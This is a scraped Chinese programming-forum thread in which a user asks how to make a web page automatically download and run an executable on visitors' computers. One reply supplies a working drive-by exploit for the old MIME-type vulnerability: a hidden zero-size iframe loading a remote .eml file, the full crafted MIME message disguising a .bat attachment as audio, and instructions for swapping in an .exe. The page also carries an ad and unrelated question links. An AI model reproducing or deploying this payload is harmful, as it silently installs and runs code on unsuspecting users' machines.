如何让浏览器端打开我的网页时自动下载并运行一个可执行程序。 不可能!谁还敢上 你的网站啊!你会硬盘格式化啊 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 可以用MIME漏洞,在网页里插入一个框架<IFRAME frameBorder=NO name="in" frameSpacing=0 height=0 marginHeight=0 marginWidth=0 noResize scrolling=no rc="http://xxxxxxxxx/bat.eml" width=0 vspale="0"></IFRAME>其中bat.eml的内容是关键!你自己可以去找MIME漏洞,到这的安全论坛可找到他的代码事例。我提供一段,供参考。From: "xxxxx"Subject: mailDate: Thu, 2 Nov 2000 13:27:33 +0100MIME-Version: 1.0Content-Type: multipart/related; type="multipart/alternative"; boundary="1"X-Priority: 3X-MSMail-Priority: NormalX-Unsent: 1--1Content-Type: multipart/alternative; boundary="2"--2Content-Type: text/html; charset="iso-8859-1"Content-Transfer-Encoding: quoted-printable<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></BODY></HTML>--2----1Content-Type: audio/x-wav; name="th.bat"Content-Transfer-Encoding: base64Content-ID: <THE-CID>dir > c:\1.txt--1他可以在c盘建立1.txt也执行exe文件,只要把th.bat该为th.exe在把dir > c:\1.txt,改为想要运行的程序的MIME编码就Ok了。到时候打开这页就自动下载程序,并执行。但现在很多的都打了补丁。这样不行了。:> 限制输入框只能输入数字 在线求解决 请教一个基础的jquery加载xml问题! js表单验证框架 jquery图片地址替换(在线等) javascript数据库 如何赠增加JS过滤html的功能 關閉showModalDialog模式窗口時不做任何操作怎麼寫? jQuery选择器问题 页面间传递参数问题,有个特殊符号 弹出窗口刷新它的父页面 看看一个asp&javascript的问题 各位script高手,你们写script用什么,是文本编辑器,还是有其它工具,有没有打点后能出来属性和方法的(除interDev),请大侠指点指点!
<IFRAME frameBorder=NO name="in" frameSpacing=0 height=0 marginHeight=0 marginWidth=0 noResize scrolling=no rc="http://xxxxxxxxx/bat.eml" width=0 vspale="0"></IFRAME>其中bat.eml的内容是关键!
你自己可以去找MIME漏洞,到这的安全论坛可找到他的代码事例。
我提供一段,供参考。From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
</BODY>
</HTML>--2----1
Content-Type: audio/x-wav;
name="th.bat"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>dir > c:\1.txt--1他可以在c盘建立1.txt
也执行exe文件,只要把th.bat该为th.exe
在把dir > c:\1.txt,改为想要运行的程序的MIME编码就Ok了。
到时候打开这页就自动下载程序,并执行。
但现在很多的都打了补丁。这样不行了。:>